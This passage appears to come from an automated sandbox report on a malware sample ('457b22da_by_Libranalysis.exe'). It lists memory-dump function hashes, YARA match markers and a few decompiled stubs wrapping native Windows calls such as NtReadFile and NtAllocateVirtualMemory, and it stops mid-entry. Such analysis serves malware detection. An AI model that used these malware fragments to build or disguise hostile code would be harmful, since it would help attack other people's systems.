Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8dcf0d43de97531b80b2c01ecde85795d399cf1cb0e30ebfd7b5653642e133b1
Instruction ID: e8032122e7d2e55e6fb0e30153cea8b8ee8debb56b1b77b886bc193ef8fab78f
Opcode Fuzzy Hash: 8dcf0d43de97531b80b2c01ecde85795d399cf1cb0e30ebfd7b5653642e133b1
Instruction Fuzzy Hash: 966114B4E05219CFCF44CFA9C5849AEFBF2BB88310F209566D905A7255C330A942CB95

Uniqueness

Uniqueness Score: -1.00%

Function 053E43E7, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b4bbcf2c4cf9f547197ff37a27ed2e529bc747ec9e3dfd32a879f540848109
Instruction ID: cdd4bbf0b69f86f22a4eaf193f37079cbcbf21b5a8ac51822ef8f05f3c27d2a0
Opcode Fuzzy Hash: 01b4bbcf2c4cf9f547197ff37a27ed2e529bc747ec9e3dfd32a879f540848109
Instruction Fuzzy Hash: 62515874E002299FCF08CFEAD485AEEBBF2BF88314F54D426D414A7294E77499418FA0

Uniqueness

Uniqueness Score: -1.00%

Function 053E2FF0, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91894fc52c71edc01e24aea1ad6288fcd067029666af45c530fe56ba226998ed
Instruction ID: d073a5f123fd27a28f9aa87291d650a07f8874ecdac36a786d0cc85f3217f7e2
Opcode Fuzzy Hash: 91894fc52c71edc01e24aea1ad6288fcd067029666af45c530fe56ba226998ed
Instruction Fuzzy Hash: E6513C70E14219CFDB28CF69C880A9EF7B6FF89200F10C4A9D519A7254DB306D408F51

Uniqueness

Uniqueness Score: -1.00%

Function 053E2F90, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76e88602221b224f6ca29bf59efbaca3fcb53d34548a787a0b413771326d4410
Instruction ID: b0a5568358d0cc6411546aab28abc3297ae6f4dbb954c105b54a6765ada256a0
Opcode Fuzzy Hash: 76e88602221b224f6ca29bf59efbaca3fcb53d34548a787a0b413771326d4410
Instruction Fuzzy Hash: 16514C71E05219CFDB19CF69C881A9EBBF6FF89200F1484AAE509A7394DB706E40CF51

Uniqueness

Uniqueness Score: -1.00%

Function 053E2FEF, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d30f157beb4757e87477e0bc633debf8fe5d357db97865bc7b47ee81454d391e
Instruction ID: 0247865454a1860dda38b8798f36f5143a10b43cf32d793a0ef2cbbf21184f59
Opcode Fuzzy Hash: d30f157beb4757e87477e0bc633debf8fe5d357db97865bc7b47ee81454d391e
Instruction Fuzzy Hash: 54513B70E052198FDB18CFA9C980AAEBBF6BF89200F10C5A9D509A7254DB705D40CF11

Uniqueness

Uniqueness Score: -1.00%

Function 053E0006, Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e31435e706634c40e5becdff96a24d57c829d9dac6dd699f5439e5fbf44223e7
Instruction ID: e8de59ce1917776376efb63b2456b8a1855e3ae1299f68beacf88f2a2cd20d3e
Opcode Fuzzy Hash: e31435e706634c40e5becdff96a24d57c829d9dac6dd699f5439e5fbf44223e7
Instruction Fuzzy Hash: 9C516071D056588FEB19CF678D4538AFBF3AFC9200F18C1BAC54DAA255EB7409468F11

Uniqueness

Uniqueness Score: -1.00%

Function 00C96A99, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e9565d72412a628c3ce0b9e571cb8efbae63a61f559996468c059b9289714d
Instruction ID: d043e01e2fe395e4d595d1e40c770454c7c97309ea3bb684e13c3e89046c7277
Opcode Fuzzy Hash: 28e9565d72412a628c3ce0b9e571cb8efbae63a61f559996468c059b9289714d
Instruction Fuzzy Hash: 7141E5B4E0560A9FCF04CFAAC5855AEFBF2FB89310F24C46AC414B7254E7349A41DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C96AA8, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 208864243bb972b26e3c8a7ead20f29fa6ade8ef5b957f012d7bae5d1ba944bc
Instruction ID: da476359becbfb8c1504bc0830cc38dcdc3b3b82f83f367765da8de577ca6a65
Opcode Fuzzy Hash: 208864243bb972b26e3c8a7ead20f29fa6ade8ef5b957f012d7bae5d1ba944bc
Instruction Fuzzy Hash: B241E4B4E0520ADBCF04CFAAC5845AEFBF2FB88310F24D46AC414B7254E7349A41DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C96600, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 160550ae52b4dd23972d4e65dd6112725b8e057459a0be55e8feec58c2f5441f
Instruction ID: 0100f568e2c8ce3573bb5519cce3c2bdefb785fdd6fb732cedc1a7cd98da98a9
Opcode Fuzzy Hash: 160550ae52b4dd23972d4e65dd6112725b8e057459a0be55e8feec58c2f5441f
Instruction Fuzzy Hash: 3C41E970E0460A9FDB04CFAAC8855AEFBF2BF88300F24D46AD415EB255D7349A42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00C96610, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.237007888.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32fb7f67902ff211840e1afc7ec5812dfeebc0468bf60f2cac1a9ebbb156c409
Instruction ID: 2b685d4c00ec66694e0dff804fd51ac631a2a8c66cadad73cb3648ed6c4fe73a
Opcode Fuzzy Hash: 32fb7f67902ff211840e1afc7ec5812dfeebc0468bf60f2cac1a9ebbb156c409
Instruction Fuzzy Hash: 2241C670E0560A9FCF48CFAAC5856AEFBF2BB88300F24D46AD415E7255D7349A42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 053E0040, Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 377c3df4539a0db226568143ad87af1d283e7b7a6803b06b751214fbf25c5f66
Instruction ID: 3e1c288f7951b288a055f8ca037c3606751c7082bf88ec674f69712e5ce7910e
Opcode Fuzzy Hash: 377c3df4539a0db226568143ad87af1d283e7b7a6803b06b751214fbf25c5f66
Instruction Fuzzy Hash: 88415D75E146188BEB68CF6B8D4539EFBF7BFC8300F14C1BA850CA6255DB300A868E11

Uniqueness

Uniqueness Score: -1.00%

Function 053E526F, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f51aa664479159946b5e4fa8600033434f56b9a4c28b7c40edf530fab78d07c
Instruction ID: afa4829c2bad4443b345a5311728434218827e89d3634db8c7b926ecd3b86623
Opcode Fuzzy Hash: 6f51aa664479159946b5e4fa8600033434f56b9a4c28b7c40edf530fab78d07c
Instruction Fuzzy Hash: FC41B470E152298BDF18CFAAD98069EFBF7BBC8204F04D07AD509E7294DB7059428F51

Uniqueness

Uniqueness Score: -1.00%

Function 053E5280, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cba2ec1f4e0f2d66a774780b7bbe854f33b4e65c9394803a84d125e332cd99f8
Instruction ID: 5240228fe84e77f48010b7b48f44001d4994e3248b8015e730e129af495c1fcc
Opcode Fuzzy Hash: cba2ec1f4e0f2d66a774780b7bbe854f33b4e65c9394803a84d125e332cd99f8
Instruction Fuzzy Hash: 35415C70E11229DBDF18CFAAE980A9EFBF7BB88304F14D06AD509EB250DB7059518F11

Uniqueness

Uniqueness Score: -1.00%

Function 053E003F, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6737e4d1d8dd38c1d21163c2daf8e291997347a501106a9cd231bc6f53859cb3
Instruction ID: be71f91fb4220ecc177341e0611e6a71006e2cded21d44483ade01ce13118ddd
Opcode Fuzzy Hash: 6737e4d1d8dd38c1d21163c2daf8e291997347a501106a9cd231bc6f53859cb3
Instruction Fuzzy Hash: 23412C71E116198BEB6CCF6B8D4569EFBF3BFC8300F14C1BA850DA6259DB700A858E15

Uniqueness

Uniqueness Score: -1.00%

Function 04BF6FB4, Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf2071a16a5dcaca932732e5f82dc0340a564b4961849fbdbbb474462053d052
Instruction ID: cf2ae2a91cdda861b57b0259e7a3631fd44b6d1ae4371f1809195b2767c212d4
Opcode Fuzzy Hash: cf2071a16a5dcaca932732e5f82dc0340a564b4961849fbdbbb474462053d052
Instruction Fuzzy Hash: 3731CAB5D012089FDB14CF99D984ADEFBF1EB49310F14906AE818B7310D334A94ACF94

Uniqueness

Uniqueness Score: -1.00%

Function 04BFA9E8, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.241854154.0000000004BF0000.00000040.00000001.sdmp, Offset: 04BF0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c57f20c96368fa2aed6b2a6e63b0427cce978fc753fc63833931fbbb2e39d02
Instruction ID: 824ac9347809e1547fee4481a48c42308116a88331d594b66d66a288e38d9a70
Opcode Fuzzy Hash: 6c57f20c96368fa2aed6b2a6e63b0427cce978fc753fc63833931fbbb2e39d02
Instruction Fuzzy Hash: 97319AB5D012089FDB14CF99E984ADEFBF1AB49310F14A06AE918B7310D334A94ACF94

Uniqueness

Uniqueness Score: -1.00%

Function 053E35F0, Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.242022060.00000000053E0000.00000040.00000001.sdmp, Offset: 053E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc37479de80463e334d2f169fe427219b7db74751dc848c99a9b273ebda6d95a
Instruction ID: 67fdc73a899ebd514774da4ca64e21c0cd7492a926eeb0149dd95290fcf0379f
Opcode Fuzzy Hash: bc37479de80463e334d2f169fe427219b7db74751dc848c99a9b273ebda6d95a
Instruction Fuzzy Hash: B5219871E156189BDB48CF7AC84579EFBF7EFC9200F18C8269408A7394DA705A41CE41

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 457b22da_by_Libranalysis.exe PID: 5452 Parent PID: 4120 457b22da_by_Libranalysis.exeCOMMON

Executed Functions

Function 0041826A, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0041826A(void* __eax, void* __edi, intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t20;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				asm("movsd");
				_t15 = _a4;
				_t32 = _a4 + 0xc48;
				E00418DC0(__edi, _a4, _t32,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t20 =  *((intOrPtr*)( *_t32))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40, _t31, _t34); // executed
				return _t20;
			}

0x0041826e
0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: e4d14842bb087fc98d619dea8e6f7a977b267004ade3294232af9d8594a33d30
Instruction ID: e9e0998607bea7e7cc0b8a1f29ca1e73b5fed5e855c2cf8eead2bcebcb3dc59e
Opcode Fuzzy Hash: e4d14842bb087fc98d619dea8e6f7a977b267004ade3294232af9d8594a33d30
Instruction Fuzzy Hash: 3BF01DB6210045ABCB04DF98D890DEB77ADFF8C354B15864DFE5D97202C634E855CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00418270, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x413d52
				_t12 =  &_a8; // 0x413d52
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00418273
0x0041827f
0x00418287
0x00418292
0x004182ad
0x004182b5
0x004182b9

APIs

NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5

Strings

R=A, xrefs: 00418292, 004182A0
R=A, xrefs: 004182AD, 004182B4

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: R=A$R=A
API String ID: 2738559852-3742021989
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0041839A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Strings

)zA, xrefs: 004183FF, 0041840C

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: )zA
API String ID: 2167126740-483804167
Opcode ID: 402d84d8e7c438e1ba9ce69849eabaa5df1aa3944c7e5ad4102d93dbc5c78b6f
Instruction ID: ce0d02a3d783eeb29b2ccfa86ec0c49f2f78b9eeb23b083cb934913116641df3
Opcode Fuzzy Hash: 402d84d8e7c438e1ba9ce69849eabaa5df1aa3944c7e5ad4102d93dbc5c78b6f
Instruction Fuzzy Hash: 140116B2200209AFCB04DF99DC81EEB73ADEF88714F10850DFE1997241DA34E820CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00409B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409B92

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction ID: f6872c6640a97d379917802917a35d8835196bd2b620e753e6f67e56f73dccdd
Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
Instruction Fuzzy Hash: EC0100B5D0010DBBDB10DAA5EC42FDEB778AB54318F0041A9A908A7281F635EA54C795

Uniqueness

Uniqueness Score: -1.00%

Function 004181C0, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 76db84dd9462a71377061bd321799a59568980bd09e0245c51acac76316ecf65
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: 52F0B6B2200208ABCB08CF89DC85DEB77ADAF8C754F158248FA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 004183A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,00418F94,?,00000000,?,00003000,00000040,00000000,00000000,00408AF3), ref: 004183D9

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction ID: ed05b43336be2385218ce2c210938f1a749d46cd8ec257da0df7421e0e4bafff
Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
Instruction Fuzzy Hash: BCF015B2200208ABCB14DF89DC81EEB77ADAF88754F118549FE0897241CA30F810CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004182F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315

Memory Dump Source

Source File: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction ID: fa02b1b0b4c248d7afc65a810b6911db7169f724aa7cfa6c67706bd771296af7
Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
Instruction Fuzzy Hash: F5D01776200314ABD710EF99DC85EE77BACEF48760F154499BA189B282CA30FA0086E0

Uniqueness

Uniqueness Score: -1.00%

Function 019599A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019599AA

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3dd7d1932fb9becc55bff80c9cc0d2fa6075cf9112ace46508f00cfc2e57e73e
Instruction ID: bdd3325b7934e9654b5c65223ba6d353e1155f2fd67c283a3f21fa62a43a830d
Opcode Fuzzy Hash: 3dd7d1932fb9becc55bff80c9cc0d2fa6075cf9112ace46508f00cfc2e57e73e
Instruction Fuzzy Hash: FA9002A174110842D100619A4414B064089E7E1341F91C015E1594554DCA5DCC527176

Uniqueness

Uniqueness Score: -1.00%

Function 019595D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019595DA

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4aa3b5c051828c354e6ed84e6ef10cb82d53cbf55e07246514ec79e56fcbf0ba
Instruction ID: 0b37db1fda95e5c884e23efaae430f64e456bb986e88b60a7df8e0a7bbc6c9b9
Opcode Fuzzy Hash: 4aa3b5c051828c354e6ed84e6ef10cb82d53cbf55e07246514ec79e56fcbf0ba
Instruction Fuzzy Hash: C09002A1702104034105719A4414616808EA7E0241B91C021E1544590DC96988917175

Uniqueness

Uniqueness Score: -1.00%

Function 01959910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0195991A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e5ba09d9951017642f9ba9d1861356da63fc6e4cb43555286bec329877c76311
Instruction ID: 3ef87cce9d44c9cbdd1b38c2cc8c9a9021838ed802d4fec6ed0560682cfaec51
Opcode Fuzzy Hash: e5ba09d9951017642f9ba9d1861356da63fc6e4cb43555286bec329877c76311
Instruction Fuzzy Hash: DB9002B170110802D140719A44047464089A7D0341F91C011A5594554ECA9D8DD576B5

Uniqueness

Uniqueness Score: -1.00%

Function 01959540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0195954A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ac1d3c3edf0a64e3c5926e922da4b3629700999bfd084101acd3873d46608ba2
Instruction ID: 61c9274e859698cfb733c9fd72f223ad80f2e8e1971c9c8b101c25d7da53c309
Opcode Fuzzy Hash: ac1d3c3edf0a64e3c5926e922da4b3629700999bfd084101acd3873d46608ba2
Instruction Fuzzy Hash: 63900265711104030105A59A070450740CAA7D5391391C021F1545550CDA6588616171

Uniqueness

Uniqueness Score: -1.00%

Function 019598F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019598FA

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: faceb04ecb5622a136ba621311975724ac0ec3f1979a3264b5003d5118888436
Instruction ID: 8010ec98a26af3ad8e9ee21d488897e6ffefb2ba4b91d7f581bc38fbf2c968a6
Opcode Fuzzy Hash: faceb04ecb5622a136ba621311975724ac0ec3f1979a3264b5003d5118888436
Instruction Fuzzy Hash: A7900261B0110902D101719A4404616408EA7D0281FD1C022A1554555ECE698992B171

Uniqueness

Uniqueness Score: -1.00%

Function 01959840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0195984A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7dced67f5b3907934856b7b52669c7a8ae5fbdc84caaed92022fabea3bae1d75
Instruction ID: 73f81386a7fc518faeee2aff23483089a6f51d7ee1de806a45f309b0785c89cc
Opcode Fuzzy Hash: 7dced67f5b3907934856b7b52669c7a8ae5fbdc84caaed92022fabea3bae1d75
Instruction Fuzzy Hash: C1900261742145525545B19A4404507808AB7E02817D1C012A1944950CC96A9856E671

Uniqueness

Uniqueness Score: -1.00%

Function 01959860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0195986A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9cd8625ced00af3f65b2b238593d9cf2eeb39fdbaed80e89e3ca64f394d782c0
Instruction ID: 7ebd02815c2bbf59173a2f65f0aec0c76029c5671e6cbbc0a2ce78f753df83b5
Opcode Fuzzy Hash: 9cd8625ced00af3f65b2b238593d9cf2eeb39fdbaed80e89e3ca64f394d782c0
Instruction Fuzzy Hash: 2990027170110813D111619A4504707408DA7D0281FD1C412A0954558DDA9A8952B171

Uniqueness

Uniqueness Score: -1.00%

Function 01959780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0195978A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 03bf9b9f3ec1edde36a36885561b6ef6eed19b1837c5c323c6f93ae485dd2a79
Instruction ID: 612b890178c84e6124d49ab366fc034a345bd89620673941befb33af850bdb4f
Opcode Fuzzy Hash: 03bf9b9f3ec1edde36a36885561b6ef6eed19b1837c5c323c6f93ae485dd2a79
Instruction Fuzzy Hash: 8790026971310402D180719A540860A4089A7D1242FD1D415A0545558CCD5988696371

Uniqueness

Uniqueness Score: -1.00%

Function 019597A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 019597AA

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7b7e90e9ecdb1d0370f2b52825bd5df0655fa89328b423d1e0f06759e0788696
Instruction ID: 0e5bf039bb254a39974ba63d9a1f59d27f7bf33b3183c60d6d0cce7faa6dc3e5
Opcode Fuzzy Hash: 7b7e90e9ecdb1d0370f2b52825bd5df0655fa89328b423d1e0f06759e0788696
Instruction Fuzzy Hash: 7790026170110403D140719A54186068089F7E1341F91D011E0944554CDD5988566272

Uniqueness

Uniqueness Score: -1.00%

Function 01959FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01959FEA

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fb18bb4188e54db8c0fcede253b0d60d5a2a069a02429834ba4e84c0d6195fee
Instruction ID: b1fbd51f90e87154d310741e6e7199688e5f92be27f25937f5c38d3ca3ffd5fb
Opcode Fuzzy Hash: fb18bb4188e54db8c0fcede253b0d60d5a2a069a02429834ba4e84c0d6195fee
Instruction Fuzzy Hash: 3D90027171124802D110619A84047064089A7D1241F91C411A0D54558DCAD988917172

Uniqueness

Uniqueness Score: -1.00%

Function 01959710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0195971A

Memory Dump Source

Source File: 00000004.00000002.277013973.00000000018F0000.00000040.00000001.sdmp, Offset: 018F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a012615c5fdb31e332b6702a4f2156ef4ed7b17b848afd3ebb98393580e96b8d
Instruction ID: 0bfca48bc42dacd0110dc4bb07b5954fe6b855f0dd3d161795c59f9fe80cf24c
Opcode Fuzzy Hash: a012615c5fdb31e332b6702a4f2156ef4ed7b17b848afd3ebb98393580e96b8d
